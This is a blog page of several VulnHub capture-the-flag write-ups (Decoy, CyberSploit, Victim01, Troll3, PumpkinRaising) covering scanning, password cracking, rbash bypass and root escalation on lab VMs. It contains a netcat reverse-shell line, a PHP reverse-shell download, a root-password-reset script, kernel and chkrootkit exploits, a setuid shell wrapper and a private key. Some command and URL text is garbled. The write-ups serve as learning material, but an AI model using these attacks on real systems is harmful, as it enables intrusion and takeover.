Category: vulnhub

Posted on

Shelling Decoy

Overview: 

Target Machine IP Address: 192.168.56.42
My Machine IP Address: 192.168.56.20

Mission: 

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.42 -o nmap.log

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdfThe zip file required a password to access it.  I am not able to find anything which could be leveraged to use as password. Let’s crack it through brute force using rockyou.txt with fcrackzip tool.

 fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 

password: manuelhttps://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

We were able to get some juicy information and I am not going to write here each file, however, I am sure you know well that shadow file is the hashed form of the password for the users.  I think this may be enough.

We need to break the hash, so let’s use john for the task and take necessary hashes and make it in one form.

username: 296640a3b825115a47b68fc44501c828

echo "$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us." | > ../hash.txt

ssh 296640a3b825115a47b68fc44501c828@192.168.56.42

password: server

We need to bypass the rbash restriction. I have never used it however, I have seen this in blog and youtube vidoes by IPPSec.

If you want to know more about rbash bypass, you can read it from here.

From that pdf resources, I tried all the commands and it didn’t work. However, as I tried the following Advance Techniques part, it no longer gives me

ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"

Now we can see that it no longer showing us rbash restriction rather command not found which means, the binary or the command path needs to be fixed here.

What I tried was I echo the PATH of my Kali Machine and copied this path and set it to the target machine. Perhaps you might understand it better if you see this screenshot.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin

Ok, let’s download pspy on Kali Machine and they transfer that to out targetted machine. I use SimpleHTTPServer to do the work, of course, you can have your own method 🙂

Let’s do a searchexploit chkrootkit or search chkrootkit on google (it will show exploit-db which is GUI of searchsploit).

When we read the exploit steps (like how to configure and how to use it), it tells us this..

The steps are quite self-explanatory, however, what I did here is, I checked the location of the NC program in the target box and then let it run /bin/sh with port 1234, to reverse a connection to IP address 192.168.56.33 (My Kali Machine). Of course, as per the instruction we need to give execution permission to out executable file

Note: I checked the cron entry and I was not able to find any relevant information that whether update (which we have created) is running nor I found chkrootkit related. Interestingly when I check the process through pspy64, periodically /tmp/update is running. Therefore, we can leverage that to our purpose. By the way, this might be because when we run this program honeypot.decoy, it triggers the chkrootkit.

Exploit 1:

#!/bin/bash
echo 'root:tcert.net' | sudo chpasswd

save it as update (by the way, you have to use nano editor this time because if I am not wrong vi editor is not available)

chmod +s update  (I sipped tea and look around) and then 

su - root 

password: tcert.net

 

Exploit 2:  (It didn’t work for me. I need to dig little deeper)

echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update
chmod +x update

That’s all guys 🙂

 

 

 

 

 

 

Posted on

Let’s pwn cybersploit machine

Overview: 

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission: 

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.40 -o nmap.log

 

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

username:itsskv

cybersploit

CyBeRSplOiT

I ran nikto but didn’t get information but gobuster did give me something..

gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

http://192.168.56.40/robots.txt

 

 

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

Let’s decrypt the string…

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

Flag1: cybersploit{youtube.com/c/cybersploit}

By the way,  you might be wondering what is at http://192.168.56.40/hacker  (it was just a gif).

Ok since, we got the username: itsskv

And password:  cybersploit{youtube.com/c/cybersploit}

And the box is running ssh, how about we try that first?

ssh itsskv@192.168.56.40

ls -lah

cat flag2.txt

I used this website to decrypt. https://cryptii.com/pipes/binary-to-english

good work !
flag2: cybersploit{https:t.me/cybersploit1}
uname -a

3.13.0-32-generic

Google  3.13.0-32-generic exploit   searchsploit didn’t work for me (I will figure this out later)

 

https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

That’s it guys! Going to have breakfast now … little hungry lol

Wish you a productive day!!

Posted on

Let’s take down victim01

Overview: 

Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20

Mission: 

To gain access to root and read the flag file Flag.txt.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- -o nmap.log 192.168.56.38

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

8080/tcp open http BusyBox httpd 1.13

8999/tcp open http WebFS httpd 1.21

9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)

http://192.168.56.38:8999

Let’s download WPA-01.cap

Let’s run the packet in wireshark

wireshark WPA-01.cap &

I tried my best to dive into the cap file, I was not able to get any anything concrete. Based on our previous machine that we did, I am having a hunch that we will get a username and a password out of this.

Although it shows many connected devices to the router (dlink), only dlink did work as a username. You might be wondering how I got the password?  You might know if you have read this post.

Yeah I did run aircrack-ng on the CAP file with rockyou file.

aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt

Yes, the password is p4ssword

ssh dlink@192.168.56.38        password: p4ssword

I made it a habit that as soon as I get a limited (or user shell), I do manually check all the low hanging fruits.

Such as

sudo -l

cat ~/.viminfo

crontab -l

history

find / -perm -u=s -type f 2>/dev/null

find / -perm 0777 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

to name a few. If I don’t find anything then I use linpeas.sh and other scripts, by uploading those to /tmp folder of that limited user account.

We found something interesting.

https://gtfobins.github.io/gtfobins/nohup/

Note: kindly bookmark this website site. https://gtfobins.github.io/

 

nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"

yeah, we got the flag..

Method 2:

To check writeable directory

find / -writable -type d 2>/dev/null 



/var/www/bolt/public/files  it has the 777 permissions

If you have carefully read the output from nmap, you might have seen that the server is running PHP cli server. That means we can upload a php reverse shell.

Let’s do that..

On Kali Machine

I have downloaded and stored my shells and other tools at /opt

python -m SimpleHTTPServer 8000

On Victim01 Machine

cd /var/www/bolt/public/files/

wget 192.168.56.33:8000/php-reverse-shell.php

chmod +x php-reverse-shell.php

And also change the IP address and Port of your choice. Mine IP: 192.168.56.33 Port:1234

Let’s set up an nc setup on Kali Machine to receive a reverse connection from the Victim01 machine.

 

I tried to execute the PHP shell on the victim machine to get the reverse connection and I get a limited shell. However, when I try to view the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know what is the primary reason behind it and I think I will need to explore more on this. However, I am gonna keep this in mind while I do shelling other boxes in the future.

yes, another way to get root!

That’s all guys 🙂

Posted on

Writeup for Troll3 machine

Overview: 

Pumpkin Raising Machine IP Address: 192.168.56.26
My Machine IP Address: 192.168.56.1

Mission: 

To gain access to root and read the flag file Flag.txt.

To know the IP address of the Target Machine:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24


https://tcert.net/wp-content/uploads/2020/07/Screenshot-from-2020-07-07-08-44-11.png

Scanning the Network

nmap -sC -sV -p- 192.168.56.26 -o nmap.log

  • sC default nmap script
  • sV reveal what services are running on the target machine with respective version numbers
    -p- it means scan all the ports (65535)
    -o ouput save to nmap.log

When I look at the vm, I can see that there is start:here. I tried ssh with start as username and here as the password

Since the user “start” not a sudo user therefore, I was not able to know what sudo command it could run.

However, there were two folders.

  • bluepill
    • awesome_work
  • redpill
    • this_will_surely_work

Both awesome_work and this_will_surely_work are ASCII text file.

 

bluepill has a shorten link, I am afraid it might automatically do some drive-by attack at hind, so let’s do a virustotal scan.

 

Virustotal report didn’t show any threat. (nevertheless, some good cryptor could bypass such scan and let’s not discuss it here)

Now, let’s unshorten the link. There are many free services available online and you can choose based on your preference.

 

 

Ok, it’s just a rabbit hole.

cat redpill/this_will_surely_work

Another rabbit hole : (

Let’s enumerate the target machine, whether it has only binary or file which has enabled SUID or SGID.

find / -perm 0777 -type f 2>/dev/null

Since, I am using uBuntu Desktop, I need to install openssh-server package to receive binaries from the target machine.

sudo apt install openssh-server -y

sudo systemctl start ssh

scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2

Narration: I am trying to transfer wytshadow.pcap file from the victim machine to my local machine at /home/researcher/vulhub/Troll3/2

 

Transfer the gold_star.txt (looks like it is list of password dictionary)

We can analyze the wytshadow.cap with Wireshark (GUI) software. However, we will try to analyze it with tcpdump (Terminal) software.

tcpdump  pending

By the look of it, I am going to guess wytshadow as username and password are in the .cap file.

We can crack the password using aircrack-ng package with password dictionary list which we got from the victim machine – gold_star.txt .

aircrack-ng -w gold_star.txt wytshadow.cap

gaUoCe34t1

ssh wytshadow@192.168.56.26

password: gaUoCe34t1

 

./oohfun

control+c to stop the execution

I checked crontab and no entry was there.

let’s figure out whether any sudo enabled binary is there.

password: gaUoCe34t1

Yes, we got something

Let’s checkout nginx configuration file, enumerate on which port it is listening. You might think why I am all of sudden taking interest in the config file. It’s because sudo is enabled on nginx. Therefore, I am trying to find some information which could be leveraged.

cat /etc/nginx/sites-enabled/default

You can see that there is a service Lynx is going to run on port 8080, if nginx runs.

Let’s verify whether is there any process running with port 8080.

netstat -ntap

Actually, this is a redundant task because we know that from the nmap.log result, we can conclude that no service is running on port 8080.

Anyway, let’s start the nginx service and, I need to google and get to know little bit about Lynx service

/usr/sbin/service nginx start

now, Lynx is listening at port 8080.

I understood now the usage of Lynx. It is more like a browser for the command line. You can read more from here.

For our purpose, what we can do is

lynx http://192.168.56.26:8080

genphlux:HF9nd0cR!

ssh genphlux@192.168.56.26

password: HF9nd0cR!

ls

cat maleus

copied the content of the maleus to key

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----
chmod 400 key

In my opinion, there might be username maleus and ssh key is the above key. Shall we try that ?

ssh maleus@192.168.56.26 -i key

indeed, it did work!

ls

dont_even_bother

file dont_even_bother

We understood it is an ELF 64-bit LSB executable.

Let’s execute it. (This approach is risk and provided you are a malware analyst, don’t execute anything on your host machine but virtual machine).

./dont_even_bother

It is expecting a password and I did try things which I could think of. No luck 🙁

Let me run a strings command

strings dont_even_bother | less

We got something interesting
screenshot
xl8Fpx%6

just a rabbit hole

cat /etc/os-release

VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

I am a little desperate here because I was not able to find anything useful. I checked the kernel version, OS release, crontab entries, history, etc..

When I tried
cat .viminfo | less
guess what I got ?


password: B^slc8I$ (I am not sure the use of it).

Shall we try sudo -i ?

No, it is not the password: B^slc8I$ (let’s keep with us a little while)

I tried sudo -l
password: B^slc8I$

Yeh! Finally…

We can use an exploit to escalate the privilege to root user.. because dont_even_bother is running with root privilege..

vi dont_even_bother

#include
#include
#include<sys/types.h>

int main()
{
setuid(geteuid());
system("/bin/bash");
return 0;
}

:wq! (To get out from vim – for new users)
source code credit

To compile it

gcc dont_even_bother.c -o dont_even_bother

some gibberish error may come, don’t worry about those..

Let’s execute our code

sudo ./dont_even_bother

Posted on

Will I get a root access to PumpkinRaising Machine ?

Overview: 

Pumpkin Raising Machine IP Address: 192.168.56.17
My Machine IP Address: 192.168.56.1

Mission: 

Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.

Step 01:

nmap -sC -sV -p- 192.168.56.17 -oN nmap.log

Output:

Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-01 13:30 IST
Nmap scan report for 192.168.56.17

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd
| http-robots.txt: 23 disallowed entries (15 shown)
| /includes/ /scripts/ /js/ /secrets/ /css/ /themes/ 
| /CHANGELOG.txt /underconstruction.html /info.php /hidden/note.txt 
| /INSTALL.mysql.txt /seeds/seed.txt.gpg /js/hidden.js /comment/reply/ 
|_/filter/tips/
|_http-server-header: Apache
|_http-title: Mission-Pumpkin

Step 02:

Actually, nmap is revealing enough information to go through however, let me stick with my methodology.

Since it is clearly running a web server on port 80. Let’s visit the website and check their source code first.

When I see there is an images folder. I was little excited because we got a beautiful tip in previous box. (It is here)

Ops!

Step 03:

You can also see that there is a base64 encoded message in the source code.

I thought this may reveal a big secret like it did in my previous pumpkin box. However, it just turned to be a little troll 🙂

As I was going  through the source code, I see a link to pumpkin.html

I took down name of the characters in my note, perhaps I could use that for some bruteforce purpose because we know that the machine is running ssh on port 22 (through nmap scanning).

In the source code, there is another encoded string, which is turn out to be base32. (I did some reading on base32 and tried myself to ensure that this string is base32).

besides, if you scroll down to bottom, you will see there is some hex string with it.

For time being, I save those hex to a file called hex.txt and keep it here for sometime, because we need to decode that base32 string.

I did download that pcap file and tried to trace it in wireshark

1)

2)

Follow the TCP Stream

3)

4)

Based on figure 3 and 4, we can conclude that we got another seed. Do you see that?

If not, see it closely..

5.

6.

To be honest, I didn’t see it at first, so what I did was, I know the SEED ID is 50609.

So, I did run a string command and everything become very clear.

See here

strings spy.pcap

Hence we got a Jack-Be-Little Pumpkin seeds ID: 50609

Step 04:

Don’t forget that we have an encoded hex string which need to be decoded. Here we go

cat hex.txt | xxd -p -r

Acorn Pumpkin Seeds ID: 96454

Step 05:

Let’s check the presence of robots.txt file

Output:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images

# Directories
Disallow: /includes/
Disallow: /scripts/
Disallow: /js/
Disallow: /secrets/
Disallow: /css/
Disallow: /themes/

#Images
Allow: /images/*.gif
Allow: /images/*.jpg

# Files
Disallow: /CHANGELOG.txt
Disallow: /underconstruction.html
Disallow: /info.php
Disallow: /hidden/note.txt
Disallow: /INSTALL.mysql.txt
Disallow: /seeds/seed.txt.gpg
Disallow: /js/hidden.js


# Paths (clean URLs)
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /scripts/pcap
Disallow: /node/add/
Disallow: /security/gettips/
Disallow: /search/hidden/
Disallow: /user/addme/
Disallow: /user/donotopen/
Disallow: /user/
Disallow: /user/settings/

I must admit that when I see this exhaustive list, I was extremely excited however, out of all, only those bold colored where actually working (or revealing information that is of my interest).

Step 04:

While I was going through the folders (enshrined in the robots.txt), I found this interesting information .

Robert : C@43r0VqG2=
Mark : Qn@F5zMg4T
goblin : 79675-06172-65206-17765

I thought it might be some SSH credentials (as you can see from the nmap result that ssh is running). However, it didn’t work. So I make a note of it and proceed with my enumeration.

Step 05:

I found another intriguing information at  192.168.56.101/seeds/seed.txt.gpg , see here. This file is encrypted with gpg

subsequently, I did download the seed.txt.gpg googled the syntax to decrypt a pgp file.

Syntax: 
gpg --decrypt seed.txt.gpg 
I tried different passwords which you got from above enumeration

Password: SEEDWATERSUNLIGHT

Probably you might think, how this guy got the password SEEDWATERSUNLIGHT ?  True, what I did was, I took down almost all words which I think could be password to a list and tried every one of them manually.  (Following screenshot is my note)

By the way, I found this word from here. If you view the source code, you will know that the sign is nothing but a space.

Do you see the space in source code?  (Don’t look at the selected strings)

 

see my failed attempt lol

Finally I got this..

based on some google, I found that above pictorial representation is a mores code.

So, we had to decode. You can simple google, decode mores code online tool. There are many online tools and out of those, I love this the most. Here is the link. https://gchq.github.io/CyberChef/

It has many other features as well and all you have to do is search mores code and chose the option, From Mores Code option.

We got a SEED:

BIGMAXPUMPKIN  SEEDS ID: 69507

I know little about stenography. After knowing that, I build a habit of myself to run exiftool, strings and stegosuite command to extract information out of any media files.  Trust me it is very tedious task however, it does pay you sometime out of nowhere lol.

Having said that, one image really carried a text file with it.

I couldn’t recall the exact box, however, once I was pwning a box when I select all the website, certain message just shows there. Therefore, I did a Control+A and do you see what I see in this message ??

From this image and our previous knowledge on this box, we can expect that there is a gif file called jackolantern.gif under images, which deduced to

http://192.168.56.17/images/jackolantern.gif

Truly there is an image by that name and the way, how author has hide this image in a meticulous way, it definitely speaks out a lot.

Yes, after running stegosuite command with all the password. Finally we found something useful.

command:

stegosuite -x jackolantern.gif -k Qn@F5zMg4T

We were able to extract a text message called decorative.txt 

cat decorative.txt

We got another SEED ID i.e.

Lil’ Pump-Ke-Mon Pumpkin seeds ID : 86568

I wish you to know that, it is not the result but I think we need to celebrate the process as well.. Like trying and enumerating everything that you could think of..

To attest what I am saying, I will enclosed one screenshot …:)

If we read carefully of those note written on the website, we got hint that we need to arrange the pumpkin seed id in order. And At that time, this screenshot helped me to order them.

Sequence of the respected pumpkin and their seedIDs:

First one is called "Big Max Pumpkin": 69507


Second: "Jack-be-little": 50609


third: "Acorn Pumpkin": 96454

forth: "Little Pump-ke-Mon": 86568

I have tried many combinations to login to ssh with different users and passwords that we got so far… Here is the note.

(many) failed attempts: (one example)

I found that following credential gives us a shell.

Username: jack
password: 69507506099645486568

Out of many rudimentary things like checking cron entries, SUID files, kernel etc. I check sudo user account ..

sudo -l

My favourite goldmine site: https://gtfobins.github.io/

Run the command

we got the root.. and the flag is here..

This box taught me many things and I am gonna revisit all the box I pwned again later.. just to evaluate did I really learn anything out of it 🙂

That’s all… Wish you all a very productive time 🙂